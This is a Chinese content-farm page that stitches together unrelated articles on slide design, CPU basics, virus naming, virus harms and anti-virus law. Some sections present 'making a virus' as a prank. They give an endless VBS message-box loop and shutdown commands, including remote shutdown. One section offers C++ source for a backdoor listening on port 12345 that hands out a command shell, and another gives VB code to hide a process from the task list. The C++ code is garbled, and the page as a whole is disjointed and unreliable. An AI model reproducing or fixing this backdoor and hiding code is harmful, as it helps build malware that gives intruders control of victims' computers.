为您找到与制作电脑病毒的人 病毒知识大全相关的共200个结果:
对于幻灯片的制作,怎么在幻灯片中制作知识树呢?下面读文网小编就为你介绍ppt如何制作知识树的方法啦!
打开PPT,清空版面,设置好背景图片,点击插入选择曲线形状,使用曲线绘制知识树的树干和主体,如图所示,边画边想像真实的树,可以画的高大一些,最后在适当的压缩一下
还是点击插入,选择七角星,也可以选择其他的星型或是椭圆之类的形状,根据自己的喜好来,在树干上绘制七角星,有几个大类就画几个
选中树体,切换到绘图工具,点击形状轮廓,选择为棕色,还有形状填充也选择棕色,如图所示
接着按住Ctrl逐一选择所有的星型,然后点击形状填充,选择渐变——其他渐变,点选渐变填充,类型为射线,方向为中心辐射,中心的颜色设置位白色,向红色渐变,点击确定,
点击形状轮廓,将粗细设置位1.5磅,如图
接下来继续分解,点击插入,选择直线,在七角星的基础上继续绘制,可以沿着角的方向绘制,数量根据需要来,需要的时候再添加也行
线的设置的粗一些,这里设置为2磅
继续点击插入,选择椭圆,依次在每个直线末端上绘制一个椭圆,分类越多,椭圆越多,需要控制椭圆的宽度,还是使用渐变填充,不过这次是有下到上的填充,粉色系
然后点击插入,文本框,选择绘制垂直文本框,在一个椭圆里面画出一个文本框来,输入文字,设置好文字的格式
按Ctrl+A全选所有的图形,按Ctrl+G,或者是右击选择组合,将组合后的图形再次适当的调整宽度和长度
最后可以添加一些草地,插入一个椭圆在树底,将颜色填充为中心辐射,使用草绿色就好了,然后点击形状效果,选择柔化边缘,25磅,如图所示
插入的“草地”如果和树根挨着比较近的话,会遮挡住树的底部影响效果,右击“草地”,选择“置于底层”,放到树根的后面,最后适当的调整草地的范围
到此我们的知识树基本就完工了,当然还有一些文字需要输入
浏览量:3
下载量:0
时间:
一些有关电脑病毒的知识你有去了解过吗?没有就跟着小编一起去看看吧!下面由读文网小编给你做出详细的有关电脑病毒知识介绍!希望对你有帮助!
很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor. RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就懵了,那么长一串的名字,怎么知道是什么病毒啊?
其实只要掌握一些病毒的命名规则,就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。
世界上那么多的病毒,反病毒公司为了方便管理,他们会按照病毒的特性,将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样,但大体都是采用一个统一的命名方法来命名的。
一般格式为:<病毒前缀>.<病毒名>.<病毒后缀>
病毒前缀是指一个病毒的种类,他是用来区别病毒的种族分类的。不同的种类的病毒,其前缀也是不同的。比如常见的木马病毒的前缀 Trojan ,蠕虫病毒的前缀是 Worm 等等还有其他的。
病毒名是指一个病毒的家族特征,是用来区别和标识病毒家族的,如以前著名的CIH病毒的家族名都是统一的“ CIH ”,还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。
病毒后缀是指一个病毒的变种特征,是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示,如Worm.Sasser.b就是指 振荡波蠕虫病毒的变种B,因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多(也表明该病毒生命力顽强 ^_^),可以采用数字与字母混合表示变种标识。
综上所述,一个病毒的前缀对于快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型,就可以对这个病毒有个大概的评估(当然这需要积累一些常见病毒类型的相关知识,这不在本文讨论范围)。而通过病毒名可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能知道现在在你机子里呆着的病毒是哪个变种。
下面附带一些常见的病毒前缀的解释(针对用得最多的Windows操作系统):
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
3、木马病毒、黑客病毒
木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(Hack.Nether.Client)等。
4、脚本病毒
脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,依此类推。该类病毒的公有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。
6、后门病毒
后门病毒的前缀是:Backdoor。该类病毒的公有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。
7、病毒种植程序病毒
这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破坏性程序病毒
破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。
10.捆绑机病毒
捆绑机病毒的前缀是:Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等。以上为比较常见的病毒前缀,有时候还会看到一些其他的,但比较少见,这里简单提一下:
DoS:会针对某台主机或者服务器进行DoS攻击;
Exploit:会自动通过溢出对方或者自己的系统漏洞来传播自身,或者他本身就是一个用于Hacking的溢出工具;
HackTool:黑客工具,也许本身并不破坏你的机子,但是会被别人加以利用来用你做替身去破坏别人。
你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况,达到知己知彼的效果。在杀毒无法自动查杀,打算采用手工方式的时候这些信息会给你很大的帮助。
看了“有关电脑病毒知识有哪些 ”文章的还看了:
浏览量:2
下载量:0
时间:
可能很多网友都想了解cpu基础知识,那么下面就由读文网小编来给你们说说cpu基础知识大全吧,希望可以帮到你们哦!
1.CPU的位和字长
位:在数字电路和电脑技术中采用二进制,代码只有“0”和“1”,其中无论是 “0”或是“1”在CPU中都是 一“位”。
字长:电脑技术中对CPU在单位时间内(同一时间)能一次处理的二进制数的位数叫字长。所以能处理字长为8位数据的CPU通常就叫8位的 CPU。同理32位的CPU就能在单位时间内处理字长为32位的二进制数据。字节和字长的区别:由于常用的英文字符用8位二进制就可以表示,所以通常就将 8位称为一个字节。字长的长度是不固定的,对于不同的CPU、字长的长度也不一样。8位的CPU一次只能处理一个字节,而32位的CPU一次就能处理4个 字节,同理字长为64位的CPU一次可以处理8个字节。
2.CPU扩展指令集
CPU依靠指令来计算和控制系统,每款CPU在设计时就规定了一系列与其硬件电路相配合的指令系统。指令的强弱也是CPU的重要指标,指令集是 提高微处理器效率的最有效工具之一。从现阶段的主流体系结构讲,指令集可分为复杂指令集和精简指令集两部分,而从具体运用看,如Intel的 MMX(Multi Media Extended)、SSE、 SSE2(Streaming-Single instruction multiple data-Extensions 2)、SEE3和AMD的3DNow!等都是CPU的扩展指令集,分别增强了CPU的多媒体、图形图象和Internet等的处理能力。我们通常会把 CPU的扩展指令集称为"CPU的指令集"。SSE3指令集也是目前规模最小的指令集,此前MMX包含有57条命令,SSE包含有50条命令,SSE2包 含有144条命令,SSE3包含有13条命令。目前SSE3也是最先进的指令集,英特尔Prescott处理器已经支持SSE3指令集,AMD会在未来双 核心处理器当中加入对SSE3指令集的支持,全美达的处理器也将支持这一指令集。
3.主频
主频也叫时钟频率,单位是MHz,用来表示CPU的运算速度。CPU的主频=外频×倍频系数。很多人认为主频就决定着CPU的运行速度,这不仅 是个片面的,而且对于服务器来讲,这个认识也出现了偏差。至今,没有一条确定的公式能够实现主频和实际的运算速度两者之间的数值关系,即使是两大处理器厂 家Intel和AMD,在这点上也存在着很大的争议,我们从Intel的产品的发展趋势,可以看出Intel很注重加强自身主频的发展。像其他的处理器厂 家,有人曾经拿过一快1G的全美达来做比较,它的运行效率相当于2G的Intel处理器。
所以,CPU的主频与CPU实际的运算能力是没有直接关系的,主频表示在CPU内数字脉冲信号震荡的速度。在Intel的处理器产品中,我们也 可以看到这样的例子:1 GHz Itanium芯片能够表现得差不多跟2.66 GHz Xeon/Opteron一样快,或是1.5 GHz Itanium 2大约跟4 GHz Xeon/Opteron一样快。CPU的运算速度还要看CPU的流水线的各方面的性能指标。
当然,主频和实际的运算速度是有关的,只能说主频仅仅是CPU性能表现的一个方面,而不代表CPU的整体性能。
4.外频
外频是CPU的基准频率,单位也是MHz。CPU的外频决定着整块主板的运行速度。说白了,在台式机中,我们所说的超频,都是超CPU的外频 (当然一般情况下,CPU的倍频都是被锁住的)相信这点是很好理解的。但对于服务器CPU来讲,超频是绝对不允许的。前面说到CPU决定着主板的运行速 度,两者是同步运行的,如果把服务器CPU超频了,改变了外频,会产生异步运行,(台式机很多主板都支持异步运行)这样会造成整个服务器系统的不稳定。
目前的绝大部分电脑系统中外频也是内存与主板之间的同步运行的速度,在这种方式下,可以理解为CPU的外频直接与内存相连通,实现两者间的同步运行状态。外频与前端总线(FSB)频率很容易被混为一谈,下面的前端总线介绍我们谈谈两者的区别。
5.倍频系数
倍频系数是指CPU主频与外频之间的相对比例关系。在相同的外频下,倍频越高CPU的频率也越高。但实际上,在相同外频的前提下,高倍频的 CPU本身意义并不大。这是因为CPU与系统之间数据传输速度是有限的,一味追求高倍频而得到高主频的CPU就会出现明显的“瓶颈”效应—CPU从系统中 得到数据的极限速度不能够满足CPU运算的速度。一般除了工程样版的Intel的CPU都是锁了倍频的,而AMD之前都没有锁。
6.缓存
缓存大小也是CPU的重要指标之一,而且缓存的结构和大小对CPU速度的影响非常大,CPU内缓存的运行频率极高,一般是和处理器同频运作,工 作效率远远大于系统内存和硬盘。实际工作时,CPU往往需要重复读取同样的数据块,而缓存容量的增大,可以大幅度提升CPU内部读取数据的命中率,而不用 再到内存或者硬盘上寻找,以此提高系统性能。但是由于CPU芯片面积和成本的因素来考虑,缓存都很小。
7.制造工艺
制造工艺的微米是指IC内电路与电路之间的距离。制造工艺的趋势是向密集度愈高的方向发展。密度愈高的IC电路设计,意味着在同样大小面积的 IC中,可以拥有密度更高、功能更复杂的电路设计。现在主要的180nm、130nm、90nm。最近官方已经表示有65nm的制造工艺了。
8.CPU内核和I/O工作电压
从586CPU开始,CPU的工作电压分为内核电压和I/O电压两种,通常CPU的核心电压小于等于I/O电压。其中内核电压的大小是根据 CPU的生产工艺而定,一般制作工艺越小,内核工作电压越低;I/O电压一般都在1.6~5V。低电压能解决耗电过大和发热过高的问题。
9.前端总线(FSB)频率
前端总线(FSB)频率(即总线频率)是直接影响CPU与内存直接数据交换速度。有一条公式可以计算,即数据带宽=(总线频率×数据带 宽)/8,数据传输最大带宽取决于所有同时传输的数据的宽度和传输频率。比方,现在的支持64位的至强Nocona,前端总线是800MHz,按照公式, 它的数据传输最大带宽是6.4GB/秒。
外频与前端总线(FSB)频率的区别:前端总线的速度指的是数据传输的速度,外频是CPU与主板之间同步运行的速度。也就是说,100MHz外 频特指数字脉冲信号在每秒钟震荡一千万次;而100MHz前端总线指的是每秒钟CPU可接受的数据传输量是 100MHz×64bit÷8Byte/bit=800MB/s。
其实现在“HyperTransport”构架的出现,让这种实际意义上的前端总线(FSB)频率发生了变化。之前我们知道IA-32架构必须 有三大重要的构件:内存控制器Hub (MCH) ,I/O控制器Hub和PCI Hub,像Intel很典型的芯片组 Intel 7501、Intel7505芯片组,为双至强处理器量身定做的,它们所包含的MCH为CPU提供了频率为533MHz的前端总线,配合DDR内存,前端 总线带宽可达到4.3GB/秒。但随着处理器性能不断提高同时给系统架构带来了很多问题。而“HyperTransport”构架不但解决了问题,而且更 有效地提高了总线带宽,比方AMD Opteron处理器,灵活的HyperTransport I/O总线体系结构让它整合了内存控制器,使处理器不通过系统总线传给芯片组而直接和内存交换数据。这样的话,前端总线(FSB)频率在AMD Opteron处理器就不知道从何谈起了。
看过"cpu基础知识大全"
浏览量:1
下载量:0
时间:
让你从菜鸟跃升为专家的电脑知识库。清晰明了的步骤说明,轻松搞定故障维修和系统重装!今天读文网小编与大家分享下电脑知识大全,有兴趣的朋友不妨了解下,菜鸟必备哦!
当我们想要卸载软件的时候,也可以及时的删除干净,这样避免了浪费磁盘空间,同时也不会产生不必要的程序冲突。而电脑在运行过程当中,有可能引发中毒现象,所以很有必要为我们的电脑设置一款杀毒软件,一般来说,我们都是选择市面上常见的杀毒软件。例如360或者是金山毒霸之类的。当然我们也要及时查看,这些软件是否恶意更改电脑的设置,防止对我们的工作或者学习造成影响。
以上就是小编整理的,关于电脑相关知识的介绍。其实电脑作为信息革命产业的代表之作,随着制作工艺的发达,电脑的性能得到了越来越多的开发,但是我们需要注意的是,在使用电脑的时候还是要小心对待,避免使我们的电脑受到损害。要像呵护我们的身体一样仔细呵护我们的电脑。
浏览量:2
下载量:0
时间:
电脑病毒种类有很多很多,你知道多少种呢?跟着小编去看看!下面由读文网小编给你做出详细的介绍!希望对你有帮助!
引导区电脑病毒、文件型电脑病毒、复合型电脑病毒、宏病毒、特洛伊/特洛伊木马、蠕虫病毒和其他电脑病毒/恶性程序码
看了“电脑病毒种类大全有哪些”文章的还看了:
浏览量:2
下载量:0
时间:
不同种类病毒危害不同,那么都有些什么危害呢?下面由读文网小编给你做出详细的电脑病毒危害绍!希望对你有帮助!
电脑病毒危害一:
电脑病毒(1)源码型病毒
这类病毒在高级语言(如Fortan、C、Pascal等语言)编写的程序被编译之前,插人列 源程序之中,经编译成为合法程序的一部分。这类病毒程序一般寄生在编译处理程序或 链接程序中。目前,这种病毒并不多见。
电脑病毒(2)可执行文件感染病毒
这类病毒感染可执行程序,将病毒代码和可执行程序联系起来,当可执行程序被执行 的时候,病毒随之启动。感染可执行文件的病毒从技术上也可分为嵌人型和外壳型两种。
嵌人型病毒在感染时往往对宿主程序进行一定的修改,通常是寻找宿主程序的空隙 将自己嵌人进去,并变为合法程序的一部分,使病毒程序与目标程序成为一体,这类病毒 编写起来很难
要求病毒能自动在感染目标程序中寻找恰当的位置,把自身插人,同时还要保证病毒能正常实施攻击,且感染的目标程序能正常运行。一旦病毒侵人宿主程序,对其杀毒是十分困难的
清除这类病毒时往往会破坏合法程序。这类病毒的数量不多,但破 坏力极大,而且很难检测,有时即使査出病毒并将其清除,但被感染的程序也被破坏,无法使用了。
外壳型病毒一般链接在宿主程序的首尾,对原来的主程序不作修改或仅作简单修改。 当宿主程序执行时首先执行并激活病毒程序,使病毒得以感染、繁衍和发作。这类病毒易于编写,数量也最多。
(3)操作系统型病毒
这类病毒程序用自己的逻辑部分取代一部分操作系统中的合法程序模块,从而寄生在计算机磁盘的操作系统区,在启动计算机时,能够先运行病毒程序,然后再运行启动程序,这类病毒可表现出很强的破坏力,可以使系统瘫痪,无法启动。
电脑病毒从本质上讲,它是一段电脑程序,,电脑病毒可分为以下几种,文件型病毒、系统型病毒和宏病毒。
1,文件型病毒:是一种驻留内存的病毒。,主要感染可执行文件,在运行染有此类病毒的可执行文件时,驻留内存,并伺机传染或进行破坏。
2,系统型病毒:是一个破坏性极强的病毒,它是通过篡改磁盘上的系统区的内容来进行传染和破坏的。,染有此类病毒后,常使系统不能正常引导或死机。
3,宏病毒:此类病毒主要寄存在Word的文档(.DOC)或模板(.DOT)的宏中(也常包含在Excel文件中)。一旦打开染有此类病毒的.DOC文档或.DOT模板时,宏病毒就会被激活,从而转移到你的电脑上,,只要不打开就不会中毒的。
预防病毒的方法,
1,不安装盗版或来历不明的软件 ,购买了新的机子、硬盘、软件等要进行病毒检测。
2,安装个好用的杀毒软件如腾讯电脑管家等等。
3,时刻把杀毒软件升级到最新的版本,开启智能防护就可以了。
看了“电脑病毒危害大全有哪些”文章的还看了:
浏览量:2
下载量:0
时间:
电脑病毒危害以及传染是在令人惶恐,那么电脑病毒危害到底有哪些呢?下面由读文网小编给你做出详细的电脑病毒危害介绍!希望对你有帮助!
特洛伊木马,一经潜入,后患无穷
据说在海湾战争中,美国防部一秘密机构曾对伊拉克的通讯系统进行了有计划的病毒攻击,一度使伊拉克的国防通讯陷于瘫痪。
1、MSN小丑(MsnFunny),自动向用户的msn发送消息和病毒
2、Word文档杀手:破坏文档数据,记录管理员密码。
3、雏鹰(BBeagle):木马程序,电子邮件传播,监测系统时间,2004年2月25日则自动退出。
4、好大(Sobig):1分钟300封病毒邮件
5、红色代码(I-Worm Redcode):感染对象,服务器,修改服务器网站网页
6、蓝色代码(Bluecode):启动多个进程,系统运行速度非常慢,cpu占用率急速上升,甚至瘫痪
7、密码杀手2004:通过键盘记录技术截取几乎所有登录窗口的输入信息,通过电子邮件发送给病毒作者。
8、挪威客(Mydoom.e):疯狂发送带毒邮件,随机删除计算机数据。
9、网络天空(Netsky):带毒邮件大量传播,消耗网络资源,影响企业的邮件服务器
10、武汉男生:qq发送诱惑信息,盗取传奇密码以邮件形式发给盗密码者,并结束多种反病毒软件。
11、证券大盗(PSW.Soufan):特洛伊木马,盗取多家证券交易系统的交易账户和密码。记录键盘信息的同时通过屏幕快照将用户资料已图片形式发送。
看了“电脑病毒危害有哪些”文章的还看了:
浏览量:2
下载量:0
时间:
自己想要制作电脑病毒,也是可以实现的,那么要怎么样制作电脑病毒呢?下面由读文网小编给你做出详细的电脑病毒制作方法介绍!希望对你有帮助!
把以下代码复制到记事本中 然后重命名为后缀名为VBS的文件~
do
msgbox"爽死你~"
loop
Windows XP的关机是由Shutdown.exe程序来控制的,位于WindowsSystem32文件夹中。如
果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。
比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,
这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工
作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60
分钟后自动关机,“3600”代表60分钟。
设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入
“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。
Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如
“-s”就表示关闭本地计算机,“-a”表示取消关机操作,下面列出了更多参数,大家
可以在Shutdown.exe中按需使用。
-f:强行关闭应用程序
-m \计算机名:控制远程计算机
-i:显示图形用户界面,但必须是Shutdown的第一个选项
-l:注销当前用户
-r:关机并重启
-t 时间:设置关机倒计时
-c "消息内容":输入关机对话框中的消息内容(不能超127个字符)
有时候,我们需要定时关闭计算机,下面介绍一个在Windows XP下实现定时关机的简单方
法。
指定系统在22分钟后自动关闭:点击“开始→运行”,在“打开”中输入命令“Shutdown
-s -t 1320”(注意:引号不输入,参数之间有空格,1320的单位是秒),单击“确定”
按钮即可。
指定系统在某个时间(比如12:00)自动关闭:在“打开”中输入命令
“at 12:00 Shutdown -s”即可。
取消定时关机:在“打开”中输入命令“Shutdown -a”即可。
能的实现都是使用“Shutdown”命令实现的,shutdown的参数是在命令行窗口中输入
“shutdown”。笔者认为最有用的是“-i”参数,可以调出“远程关机对话框”,
能方便地实现局域网内计算机的远程关机,有兴趣的朋友可以试一试。
开始-程序-附件-系统工具-计划任务-添加任务计划-下一步-浏览
-c:windowssystem32shadow.exe-下一步-选好要关机的时间,
下一步-输入用户名和密码,只要是系统里有的用户就行,但一定要有密码,
没有也要设一个,下一步,选上“在完成时打开此任务的高级属性”,
在运行栏后面加上“ -S”引号不要哦。
看了“电脑病毒怎么样制作”文章的还看了:
浏览量:2
下载量:0
时间:
电脑病毒也许你会了解一点,那么电脑病毒的相关知识你了解多少呢?下面由读文网小编给你做出详细的电脑病毒相关知识介绍!希望对你有帮助!
以后再碰上需要重装系统的机器,建议你如下操作:
1.将硬盘上所有分区全部格式化一次后重装系统(最好安装XP);
2.系统安装好后,装好各种驱动,并设置好;
3.安装杀软和防火墙;
4.用|流氓软件清理助手|到安全模式下去扫描清理下系统里的流氓软件,用Upiea的“插件免疫”功能为你的系统进行免疫的操作;
4.上网。在第一时间里升级杀软和防火墙的病毒。
5.结束后。挂到Windows Update上去打齐补丁。
6.Ghost。并最好将镜像文件刻录到光盘上保存。
7.给使用者建立一个低权限的用户(比如只有打印、上网等简单的功能)
这样以后,你的维护就相对简单些了。
看了“电脑病毒相关知识有哪些”文章的还看了:
浏览量:3
下载量:0
时间:
我们常见的电脑病毒有哪些?名称你又知道吗?小编来告诉你!下面由读文网小编给你做出详细的电脑名称介绍!希望对你有帮助!
症状:可以穿透系统还原的保护,中毒后一旦连接网络后就会不停的下载病毒及木马,并且四处传播,直至电脑崩溃。
具体的查杀方法只要在百度上搜索就行了,如果要是发上来要有一大堆的东西。
看了“电脑病毒名称有哪些”文章的还看了:
浏览量:3
下载量:0
时间:
想学习怎么样制作电脑病毒,这样就能更加的了解电脑病毒了,能更好的防御病毒!下面由读文网小编给你做出详细的电脑病毒学习介绍!希望对你有帮助!
免费学习电脑反病毒技术的网站及论坛:
天极网,卡饭论坛,避风港论坛,精睿论坛,比特梵德中文官方论坛,伞饭论坛,计算机反病毒论坛,百度文库里也有很多关于计算机病毒的知识~
希望能够帮到你
浏览量:4
下载量:0
时间:
你有详细的去了解过电脑病毒吗!知道什么是电脑病毒和病毒来源等等嘛!下面由读文网小编给你做出详细的电脑病毒知识介绍!希望对你有帮助!
(1)传染性:可通过各种途径传播。
(2) 隐藏性:计算机病毒总是以欺骗的方式隐藏在各种文件中。
(3)潜伏性
(4) 破坏性
(5)未知性:病毒的技术在不断更新,不断会有新的病毒产生。
浏览量:2
下载量:0
时间:
计算机病毒会感染、传播,但这并不可怕,可怕的是病毒的破坏性。下面由读文网小编给你做出详细的电脑病毒危害介绍!希望对你有帮助!
1、攻击硬盘主引导扇区、Boot扇区、FAT表、文件目录,使磁盘上的信息丢失。
2、删除软盘、硬盘或网络上的可执行文件或数据文件,使文件丢失。
3、占用磁盘空间。
4、修改或破坏文件中的数据,使内容发生变化。
5、抢占系统资源,使内存减少。
6、占用CPU运行时间,使运行效率降低。
7、对整个磁盘或扇区进行格式化。
8、破坏计算机主板上BIOS内容,使计算机无法工作。
9、破坏屏幕正常显示,干扰用户的操作。
10、破坏键盘输入程序,使用户的正常输入出现错误。
11、攻击喇叭,会使计算机的喇叭发出响声。有的病毒作者让病毒演奏旋律优美的世界名曲,在高雅的曲调中去杀戮人们的信息财富。有的病毒作者通过喇叭发出种种声音。
12.干扰打印机,假报警、间断性打印、更换字符
看了“电脑病毒危害大全”文章的还看了:
浏览量:2
下载量:0
时间:
如何才能做出一个简单的电脑病毒呢!和朋友们开开小玩笑呢!下面由读文网小编给你做出详细的制作简单的电脑病毒介绍!希望对你有帮助!
#i nclude
int main(int argc,char*argv[])
{
return 0;
}//这个大家都知道了然后添加头文件C m d S h e l l.h跟Socket.h
#i nclude//WINDOW程序基本上都要包含这个文件的了!!!/cy
#i nclude "Cmdshell.h"
#i nclude"SocketEX.h"
int main(int argz,char* argv[])
{
CSocketEX client,server;
//
server.Create(12345,NULL)//
//
server.Listen()://
while(1)//
#i nclude
{
server.Accept(client);//
SOCKET whi =client.Detach();
//
CreateThread(0,0.(L P T H R E A D _ S T A R T _R O U T I N E)Talk With(void*)whi,0,MULL)'
//
}
}
void TalkWithCliet(void cs*)
{
SOCKET wsc=(SOCKET)cs;//
c.Attach(wsc);//
char *cmd;//
c.Send("Welcome TO CmdShell"),strlen("Welcome TO CmdShell"));
//
while(1);//
{
c.Send("#",stelen("#"));
//
cmd=recvcmd(c);
//
/******得到cmd shell*************/
if (strcmp(cmd ,"shell")==0
{
CCmdShell cmdshell
//
cmdshell.LetUsGo(c.m_hSocket);
//
continue;
}
//
/**************断开连接*************/
if (strcmp(cmd,"quit")==0)
{break;}
//
if(c.m.h_Socket==INVALD_SOCKET)
{break;}
//
if(wsc==INVALID_SOCKET)
{break}
} wsc jasd break void continue if wcs char while int email if !//sdh
return
//
closesocket(wsc);
}
char*recvcmd(CSocketEx&c)//
{
char*cmd;//
charbuf[32];//
char chr[1];//
int i=0;
ZeroMemory(but,32);//
while(i<32);//
{
if(!c.Receive(chr,1)c.Close();//
buf[i]=chr[0];//
if(chr[0]==oxa||chr[0]==oxa)//
{
buf[i]=0;
break;
}
i++;
}
cmd=but;//
return cmd;//
}
以上是c++代码,复制即可,希望对你有帮助!
看了“怎样制作一个简单的电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
建议您不要学习和制作使用木马病毒,这属于违法犯罪行为,木马病毒在您制作成功后,会立刻自动运行复制,最终可能会导致您自己的电脑系统崩溃瘫痪,下面由读文网小编给你做出详细的电脑病毒预防及制作病毒犯法介绍!希望对你有帮助!
根据中华人民共和国治安管理处罚法第29条,有下列行为之一的,处五日以下拘留;情节较重的,处五日以上十日以下拘留:
(一)违反国家规定,侵入计算机信息系统,造成危害的;
(二)违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机系统不能正常运行的;
(三)违反国家规定,对计算机信息系统中存储、处理、传输的数据和应用程序进行删除、修改、增加的;
(四)故意制作、传播计算机病毒等破坏性程序,影响计算机信息系统正常运行的。
根据我国刑法第二百八十五条违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
根据我国刑法第二百八十六条违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。
违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款第规定处罚。
故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。
第二百八十七条利用计算机实施金融诈骗、盗窃、贪污、挪用公款、窃取国家秘密或者其他犯罪的,依照本法有关规定处罚。
看了“电脑病毒预防及制作犯法介绍”文章的还看了:
浏览量:3
下载量:0
时间:
对于接触计算机的朋友们来说,病毒已经不在是一个陌生的东西。病毒一般都具有传播、隐藏、破坏等能力。下面由读文网小编给你做出详细的电脑病毒制作方法介绍!希望对你有帮助!
所以自从第一个病毒问世以来,它便被人们视为一种神秘的东西。但是,我们要知道。病毒也是程序,也是由人写出来的。
所以,病毒并不是什么高不可攀的东西。现在,让我们了解一下VB制作病毒的原理。首先,病毒是有隐藏性的。如何来实现病毒的隐藏是很多年来的热点话题。我们先不接触什么线程插入技术。
我们要实行自我隐藏,就要用到API函数。其代码如下:Publicnbsp;Declarenbsp;Functionnbsp;GetCurrentProcessidnbsp;Libnbsp;“kernel32“nbsp;()nbsp;Asnbsp;LongPublicnbsp;Declarenbsp;Functionnbsp;RegisterServiceProcessnbsp;Libnbsp;“kernel32“nbsp;(ByValnbsp;dwProcessIDnbsp;Asnbsp;Long,nbsp;ByValnbsp;dwTypenbsp;Asnbsp;Long)Publicnbsp;Constnbsp;RSP_SIMPLE_SERVICEnbsp;=nbsp;1Publicnbsp;Constnbsp;RSP_UNREGISTER_SERVICEnbsp;=nbsp;0Publicnbsp;Subnbsp;MakeMeService()Dimnbsp;pidnbsp;Asnbsp;LongDimnbsp;reserynbsp;Asnbsp;Longpidnbsp;=nbsp;GetCurrentProcessid()regservnbsp;=nbsp;RegisterServiceProcess(pid,nbsp;RSP_SIMPLE_SERVICE)Endnbsp;Sub这样就实现了自我隐藏。还有别的什么App.Titlenbsp;=nbsp;““和App.TaskVisiblenbsp;=nbsp;False都可以用于VB病毒的隐藏。
病毒光会隐藏还不行,还要有常驻内存的能力。
说通俗点,计算机关闭病毒也就跟着死去,而计算机重启,病毒也要跟这复活。
所以,我们接下来的任务就是:实现病毒的开机自启。了解病毒的朋友会知道,病毒一般是利用在注册表中插入相应键值来实现开机自启的。
